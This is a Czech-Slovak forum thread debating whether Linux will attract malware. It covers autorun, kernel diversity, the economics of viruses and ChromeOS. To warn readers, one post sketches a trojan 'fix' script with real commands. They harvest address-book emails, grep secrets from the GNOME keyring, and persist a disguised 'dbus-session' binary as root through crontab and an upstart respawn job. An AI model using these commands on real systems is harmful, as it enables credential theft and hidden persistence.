Co vy na to? (k článku linux&malware)

[thomaszko]

Ahoj cetli jste nekdo tento clanek? http://pcworld.cz/software/komentar-docka-se-linux-malware-8416 . Co na nej rikate?

[wam]Spider007]

hmm....zaujimave, ale su to len dohady a len cas ukaze co naozaj bude. Navyse tito "novinari" stale pisu o tom, ako linux nikto nepouziva. Ked sa im to vsak hodi, tak napisu, ze podiel alebo teda absolutny pocet pouzivatelov stupa.

[Marvn]

http://linuxzblizka.blog.zive.cz/2009/11/bezpecnost-linuxu/

btw. debat o bezpecnosti linuxu je vsude plno, staci hledat (treba tady na foru)

[LuciusMare]

http://linuxzblizka.blog.zive.cz/2009/11/bezpecnost-linuxu/

btw. debat o bezpecnosti linuxu je vsude plno, staci hledat (treba tady na foru)

Tak tak, takovych topicu tu byly kvanta a nikam to nevedlo

[menganito]

http://ask.slashdot.org/story/09/12/01/0025213/Ethics-of-Releasing-Non-Malicious-Linux-Malware?art_pos=5

[pepéé]

ten článek je hrozná blbost. pravda je že, ty tzv. škodlyvé kody se budou víc zaměřovat na linux s rostoucí popularitou ale linux sám o sobě je svým principem dostatečně chráněný.
většina softvaru se instaluje chráněných linuxových servru kde se žádný škodlyvý kod nemá jak dostat.
Nikdy nebude tak diravej jak win a nechápu, že linux s win někdo dokáže srovnávat 

[Martin Šácha]

Autor článku spíše naráží na to, že se na linuxové stroje dostanou zkrze ,,standardní" desktopové aplikace např. Java, OOo (potenciál maker), Wine (!), Flash... než na to že by někdo vyráběl škodlivé linuxové binárky.

[MacHala]

me ten clanek prisel silne podprumerny i na to , ze ho napsal Vojtech Bednar - zvlast to, jak tam pise o "security via obscurity" - klasicky se tohle oznaceni pouziva pro uzavreny kod(chraneny svou tajnosti, ne bezpecnosti smaotneho navrhu) a ne pro otevreny, ale malo pouzivany...

[thomaszko]

hmm....zaujimave, ale su to len dohady a len cas ukaze co naozaj bude. Navyse tito "novinari" stale pisu o tom, ako linux nikto nepouziva. Ked sa im to vsak hodi, tak napisu, ze podiel alebo teda absolutny pocet pouzivatelov stupa.

Jo ja mam taky pocit ze jen co se jim hodi aby bylo ocem psat...

[Firzen]

Škodlivý software v linuxu je úplně dobře proveditelný, stejně jako ve Windows. Avšak ty aplikační prostředí a frameworky jsou virům k ničemu, protože pořád musí být nějaká cesta, jak vir do systému dopravit. To je právě v linuxu dost těžké.

Vyjmenuju tady některé cesty k infekci, které znám..

1. výměnná zařízení
     Neznám asi žádnou distribuci, která by podporovala jakési automatické spuštění nějakého programu např. z CDčka, tak jak je tomu ve Windows. Žádný Autorun.inf v linuxu snad ani neexistuje, alespoň, co já vím - a pokud ano, tak je ignorován. Pokud virový program na médiu uživatel skutečně spustí, tak se může v tom nejhorším případě stát to, že se mu smaže celý /home adresář. Ale víc nic. Ano, sice se může virus zapsat na automaticky spouštěné aplikace při startu třeba Gnome, a taky tedy může infikovat další připojená zařízení, může nechat spadnout některé programy, může se i pokoušet lámat různá uživatelova hesla v různých aplikacích jako třeba firefox, pidgin, thunderbird.. No, asi je jen tak honem nezjistí. Program by mohl obsahovat exploit, kterým by si získal oprávnění roota, jenže kernely nejsou stejné, a jejich verze se docela rychle mění, takže takový virus by moc dlouho nepřežil. (i kdyby se nějak aktualizoval, tak by se mohlo stát, že při cestě na flash disku do jiného počítače by uběhla delší doba a mezitím by už cílová stanice obsahovala opravu, útok by se tak nekonal)  Navíc prostě není zvykem někde mít jen tak spustitelné soubory nějakého programu, kromě těch mých jsem na žádný nenarazil snad nikdy, vy ano?
     Další možnost je samozřejmě infikovaný balíček. Jenže balíčkovacích systémů je víc a tak by virový pisálek musel udělat několik portů a nebo by se soustředil na jednu větev (třeba na Red Hatí). Jenže ani to by nebylo dokonalé, někde by nešly vyřešit závislosti, někdo by zase nechtěl instalovat balíček takhle podezřele..

2. po síti
     Kdyby někdo znal nějakou chybu jádra, která by se dala zneužít třeba paketem o určité délce na určitém portu, mohl by ovládnout linuxové stroje.. vlastně jen některé, protože někdo by měl exotické jádro, někdo by měl jádro doma kompilované, kam si něco přidal, někdo by měl jinou verzi, někdo by měl port zablokovaný... Viru by zbyla jen část počítačů, které by byl schopen nakazit a na nich by se byl pochopitelně schopen dále šířit. Ale asi jen na těch s tím pravým jádrem.

Prostě si myslím, že linux tyhle problémy v plné síle jak je známe ve Windows dnes nikdy mít nebude a to jednoduše proto, že je to celé příliš složité. Většina lidí instaluje programy z repozitářů, kde žádné viry nejsou (a pokud ano, tak se hned objevý nespokojený uživatel, který bude plakat a hlásit bug a bude šmitec), jádro má u nich životnost pár měsíců, a desktopové prostředí často taky (třeba u mě).

U Windows je to jiné - všichni mají jádro úplně stejné, všichni mají internet explorer (tedy téměř), a alespoň párkrát ho třeba nechtíc spustili, všichni mají stejnou adresářovou strukturu.

Kdyby byli lidé klony, tak by jedna nemoc vyhubila celé lidstvo na jeden zátah. Ale lidé nejsou stejní, stejně jako linuxové systémy nejsou stejné a proto je nelze nakazit všechny naráz.

[kajobert]

^^^^^ Dokonalý názor Včera sem chtěl napsat něco podobnýho /*samozřejmě né tak chytře, páč sem noob:)*/, ale po chvilce přemejšlení sem říkal, že to nemá cenu. Většina lidí tady, ví jak to je. Naprosto s tebou souhlasím... Nechci nikoho odsuzovat, ale IMO nikdy nebude rozšířená jen "jedna" identická distribuce, a už vůbec né tak dlouho(update4ever), aby se někomu vyplatilo skodlivě a pracně scriptovat... (a jestli jo, tak to bude jedno, protože se vývoj OS zastaví kvůli objevu asteroidu, kterej zničí Zemi )

[hase]

Podla mna hlavnym dovodom absencie skodlivych kodov v linuxe, je ciste otazka kseftu. Pokial by to hodilo nejake prachy, tak by "virotvorcovia" uz davno na Linux zautocili. Vychadzam z toho, ze vyroba skodliveho kodu a ochrana pred nim v podobe roznych antivirov, cisticov, firewalov..., je uzko previazany biznis. tento nazor zastavam uz dlho a este nikto ma z neho nevyviedol. Vysvetlenia typu: " vyrobcovia virov su ti, ktori z nejakeho dovodu nenavidia Microsoft " (uz som to par krat cital), su smiesne a absolutne nelogicke. Pri sucasnej ochrane  vyrobit ucinny virus, ktory ochromi system, neni urcite jednoducha zalezitost a nikto sa tomu nebude venovat bezplatne.
Urcity zvrat v bezpecnosti linuxu moze priniest novy OS od Google, ktory je na linuxovom jadre. Predpokladam totiz, ze pokial sa tento system vydari a bude tak ako tvorcovia tvrdia - zadarmo, tak prechod na neho uz bude niest prvky masovosti - uz len koli menu Google! Potom uz bude vyroba vselijakej havede zaujimava - ci uz z hladiska kseftu ci konkurencneho boja.
Dovtedy sa vsak ziaden boom diat nebude, pretoze MS si s vydanim W7 skutocne napravil reputaciu - je to vydareny a dobre zabezpeceny system.  
 

[menganito]

Neznám asi žádnou distribuci, která by podporovala jakési automatické spuštění nějakého programu např. z CDčka, tak jak je tomu ve Windows. Žádný Autorun.inf v linuxu snad ani neexistuje, alespoň, co já vím - a pokud ano, tak je ignorován.

Chvála Bohu za to. Jediné, čo sa dá spustiť vložením kľúča sú programy (prehliadač foto, video player) ktoré už suú nainštalované.

...tak se může v tom nejhorším případě stát to, že se mu smaže celý /home adresář. Ale víc nic. Ano, sice se může virus zapsat na automaticky spouštěné aplikace při startu třeba Gnome, a taky tedy může infikovat další připojená zařízení, může nechat spadnout některé programy, může se i pokoušet lámat různá uživatelova hesla v různých aplikacích jako třeba firefox, pidgin, thunderbird.. ...

Názor z minulého desaťročia. Deštruktívne vírusy sú minulosťou, dnes sa predovšetkým tvorí malware, ktorý umožňuje tretím stranám vzdialene ovládať PC. Na to ,aby útočník zmenil môj PC na zombie, ktorý bude odosielať tisíce spamov denne alebo ddososvať biely dom, mu netreba práva roota. V článku, ktorý som linkoval, sa práve o tomto hovorí.
Všeobecne najväščím riskom pre linuxové OS sú, paradoxne, návody na internete. Ideálna cesta na podsunutie škodlivého kódu užívateľovi: "Keď spustíš tento .sh skriptík ako root, určite ti bude fungovať wifi, aj <doplňte čokoľvek čo užívateľom nefunguje>" Skripty sú pomerne univerzálne, napr. môžu stiahnuť zdrojový kód vírusu a skompilovať ho: funguje na akejkoľvek distribúcii, nemusí mať závislosti (to, že sú niektoré distribúcie závislosťami zamorené, neznamená, že je nemožné vytvoriť program, ktorý robí všetko sám). Potom ešte pridajú spúšťanie seba samého ako daemona do initu, prípadne do cronu a bashrc a voila: počítač je k dispozíciii šikovnému "hekérovi". Ak sa navyše tým skriptom skutočne vyrieši problém, ktorý sa vyriešiť mal, užívateľ si ani nič nevšimne.

a pokud ano, tak se hned objevý nespokojený uživatel, který bude plakat a hlásit bug a bude šmitec

[ironia]A, ako vieme, všetky bugy sa promptne riešia a nové verzie balíkov sa bezodkladne zaraďujú do repozitárov.[/ironia]

U Windows je to jiné - všichni mají jádro úplně stejné, všichni mají internet explorer (tedy téměř), a alespoň párkrát ho třeba nechtíc spustili, všichni mají stejnou adresářovou strukturu.

Kdyby byli lidé klony, tak by jedna nemoc vyhubila celé lidstvo na jeden zátah. Ale lidé nejsou stejní, stejně jako linuxové systémy nejsou stejné a proto je nelze nakazit všechny naráz.

S týmto súhlasím, uniformita vedie k likvidácii.

Urcity zvrat v bezpecnosti linuxu moze priniest novy OS od Google, ktory je na linuxovom jadre. Predpokladam totiz, ze pokial sa tento system vydari a bude tak ako tvorcovia tvrdia - zadarmo, tak prechod na neho uz bude niest prvky masovosti - uz len koli menu Google! Potom uz bude vyroba vselijakej havede zaujimava - ci uz z hladiska kseftu ci konkurencneho boja.

A navyše, všetky dáta, nastavenia, dokumenty, osobné údaje atď, budú na serveroch googlu a teda budú zraniteľné aj bez prispenia užívateľa. ChromeOS bude prvou veľkou skúškou bezpečnosti Linuxu na desktope bežných užívateľov v praxi.

[pepéé]

Podla mna hlavnym dovodom absencie skodlivych kodov v linuxe, je ciste otazka kseftu. Pokial by to hodilo nejake prachy, tak by "virotvorcovia" uz davno na Linux zautocili. Vychadzam z toho, ze vyroba skodliveho kodu a ochrana pred nim v podobe roznych antivirov, cisticov, firewalov..., je uzko previazany biznis. tento nazor zastavam uz dlho a este nikto ma z neho nevyviedol. Vysvetlenia typu: " vyrobcovia virov su ti, ktori z nejakeho dovodu nenavidia Microsoft " (uz som to par krat cital), su smiesne a absolutne nelogicke. Pri sucasnej ochrane  vyrobit ucinny virus, ktory ochromi system, neni urcite jednoducha zalezitost a nikto sa tomu nebude venovat bezplatne. 
 

Znám minimálně několik desítek lidí co viry tvoří sami od sebe pro svoje potěšení. Asi si tím něco dokazují.
To, že není třeba něco vytvořit a platit za to, je třeba somotné Ubuntu důkazem.
Neřekl bych že přímo nenavidí mikrosoft. Ale zničit win je hodně jednoduché a navíc výzva ukázat že, je na ho++o to zaco ostatní platí šílený prachy. důvodu by si každej našel spusty.

[hase]

Znám minimálně několik desítek lidí co viry tvoří sami od sebe pro svoje potěšení. Asi si tím něco dokazují.

Neviem, ja keby som niekoho takého poznal, tak by som mu asi dal cez držku...No, možno by som to riešil jemnejšie, ale určite by som sa s takým človekom nestýkal! Drtivá vačšina ľudí si nevie poraďiť s porúchaným systémom, prichádzajú o data, peniaze (oprava) a nervy. Človek, čo sa baví na úkor toho, že škodí neznámym ľuďom, by podľa mňa mal dostať "za vyučenou" od kažého, kto má chrbtovú kosť!

[LuciusMare]

Znám minimálně několik desítek lidí co viry tvoří sami od sebe pro svoje potěšení. Asi si tím něco dokazují.

Neviem, ja keby som niekoho takého poznal, tak by som mu asi dal cez držku...No, možno by som to riešil jemnejšie, ale určite by som sa s takým človekom nestýkal! Drtivá vačšina ľudí si nevie poraďiť s porúchaným systémom, prichádzajú o data, peniaze (oprava) a nervy. Človek, čo sa baví na úkor toho, že škodí neznámym ľuďom, by podľa mňa mal dostať "za vyučenou" od kažého, kto má chrbtovú kosť!

To si trochu odporuje s mým tvrzením že jsou to bezpáteřní blbci

[arrange]

OK, takže mám problém v Ubuntu, třeba

Kód: [Vybrat]

E: dpkg was interrupted, you must manually run 'dpkg --configure -a' to correct the problem.
E: _cache->open() failed, please report.
nebo mi třeba Grub2 nerozpoznal nějaký oddíl. Co teď? Mrknu na forum.ubuntu.cz, ale tady všude radí, UTFG. OK then. Na internetu najdu krásnou stránečku nějakého Ubuntu odborníka s přesným popisem odstranění chyby. Mám si stáhnout nějaký skript, spustit ho z Terminálu, a bude po problému!

Skript je prostý, v prvním případě ("run manually...") obsahuje prostě dpkg --configure -a no a pak dalších pár řádků, které nejsou tak důležité, jen:

- vyextrahují emailové adresy vašich přátel

Kód: [Vybrat]

evolution-addressbook-export | grep \@ | sed 's:Title\:::' | cut -d: -f2
grep -Eo '[[:alnum:]]+\@[[:alnum:]]+\.[[:alpha:]]+' ~/.mozilla-thunderbird/*/impab.mab
grep -Eo '[[:alnum:]]+\@[[:alnum:]]+\.[[:alpha:]]+' ~/.mozilla-thunderbird/*/abook.mab
- případně heslo do emailové schránky od těch, co je mají nezabezpečené

Kód: [Vybrat]

grep '^secret' ~/.gnome2/keyrings/default.keyring | cut -d= -f2
- pošlou jim krásný mail o nákupu Vi0gry
- nainstalují nějaký pěkný keylogger na odchytávání hesel, případných PINů apod. a jejich posílání na dohodnutou adresu
- nainstaluje si automatické spouštění se systémem, pojmenuji si skript pomocí některého ze slov hal, dbus, session apod., aby se na to nikdo neodvážil sáhnout a nebudil podezření (třeba dbus-session), a pak se buď hodí do cronu

Kód: [Vybrat]

echo "* * * * * root /usr/bin/dbus-session" > /etc/crontab
nebo do /etc/init skriptů

Kód: [Vybrat]

start on runlevel [2345]
stop on runlevel [!2345]
expect fork
# kdyby to někdo killnul
respawn
exec dbus-session
Uživatel je spokojen (problém vyřešen, chyba se už neobjevuje), a v systému je skript, který si s právy roota může dělat, co chce.

Nejsem odborník na bezpečnost, ale myslíte, že toto by se nemohlo stát?

[pepéé]

že se tak směle ptám....nebude potřeba k tomuhle povolení roota?
a v dnešní době si snad už nikdo z e-mailu neinstaluje žádné "keyloggery" a podobně.

a rozdíl od win je jednoznačný..neděje se to samo od sebe nýbrž samotnej uživatel svou nepozorností, hloupostí a naivitou si to musí zpřístupnit sám.

[Firzen]

arrange: Mohlo, ale to je prostě chyba uživatele.. Další počítače taková "nákaza" pochopitelně neohrozí, takže by takové hackerské plány měly jen velmi omezený účinek zcela závislý na návštěvnosti stránek s návodem (a čím více návštěvníků, tím větší pravděpodobnost, že to nějaký nepříjemný odborník odhalí a upozorní ostatní v diskuzi).

[LuciusMare]

že se tak směle ptám....nebude potřeba k tomuhle povolení roota?
a v dnešní době si snad už nikdo z e-mailu neinstaluje žádné "keyloggery" a podobně.

a rozdíl od win je jednoznačný..neděje se to samo od sebe nýbrž samotnej uživatel svou nepozorností, hloupostí a naivitou si to musí zpřístupnit sám.

Což ovšem neznamená že se to neděje a dít nebude, 99% nákazy na všech systémech je kvůli uživateli

[arrange]

že se tak směle ptám....nebude potřeba k tomuhle povolení roota?
a v dnešní době si snad už nikdo z e-mailu neinstaluje žádné "keyloggery" a podobně.

Ale jo, ale v hodně návodech najdeš příkazy, které potřebují práva roota, už jen obyčejný výpis fdisk -l. Já sám jsem například vinen naváděním ke stahování skriptů a spouštění je přes sudo Nehledě na to, že na hodně ze zmíněných věcí stačí práva uživatele.

arrange: Mohlo, ale to je prostě chyba uživatele.. Další počítače taková "nákaza" pochopitelně neohrozí, takže by takové hackerské plány měly jen velmi omezený účinek zcela závislý na návštěvnosti stránek s návodem (a čím více návštěvníků, tím větší pravděpodobnost, že to nějaký nepříjemný odborník odhalí a upozorní ostatní v diskuzi).

To je fakt. S mými nulovými hackerskými schopnostmi mě nenapadá, jak by se takový "virus" rozumně replikoval.
Na druhou stranu by taková stránka mohla existovat dlouho, po internetu koluje spousta již dávno vyvrácených blbostí, a nic nepomáhá (včetně našeho fóra, ty různé chmody -R 777 apod. : ). A svou diskuzi si mohu moderovat dle libosti.

...
Což ovšem neznamená že se to neděje a dít nebude, 99% nákazy na všech systémech je kvůli uživateli

Sranda je, že v diskuzích o bezpečnosti Linuxu je často symbolem lehce napadnutelného (=blbého) uživatele Linuxu právě Ubunťák. 

[Martin Šácha]

... Pokud virový program na médiu uživatel skutečně spustí, tak se může v tom nejhorším případě stát to, že se mu smaže celý /home adresář...

Ano, hlavně že lehce přeinstalovatelný systém zůstane nedotčen... A na nějakých pracovních dokumentech přece nesejde

[pepéé]

toď  teď otázka! Chceme vůbec aby se linux rozšířil  a aby pak byl víc naočích tvůrcům škodlivého softwaru???

[hase]

toď  teď otázka! Chceme vůbec aby se linux rozšířil  a aby pak byl víc naočích tvůrcům škodlivého softwaru???

presne tak! Hovoris mi z duse. Nech Linux nadalej zostane taky aky je, obcasne HW problemy si spokojne nejako poriesime - tym padom zostane Linux pre tych, ktori su schopni si tie tazkosti vyriesit a bude tym padom nadalej minoritny... Lenze skutocne nas moze naburat ChromeOS. 

[LuciusMare]

toď  teď otázka! Chceme vůbec aby se linux rozšířil  a aby pak byl víc naočích tvůrcům škodlivého softwaru???

presne tak! Hovoris mi z duse. Nech Linux nadalej zostane taky aky je, obcasne HW problemy si spokojne nejako poriesime - tym padom zostane Linux pre tych, ktori su schopni si tie tazkosti vyriesit a bude tym padom nadalej minoritny... Lenze skutocne nas moze naburat ChromeOS. 

Hm, teď dokonce chceme aby se nerozšířil... Já bych byl nejradši kdyby ano, i s problémy které to přináší.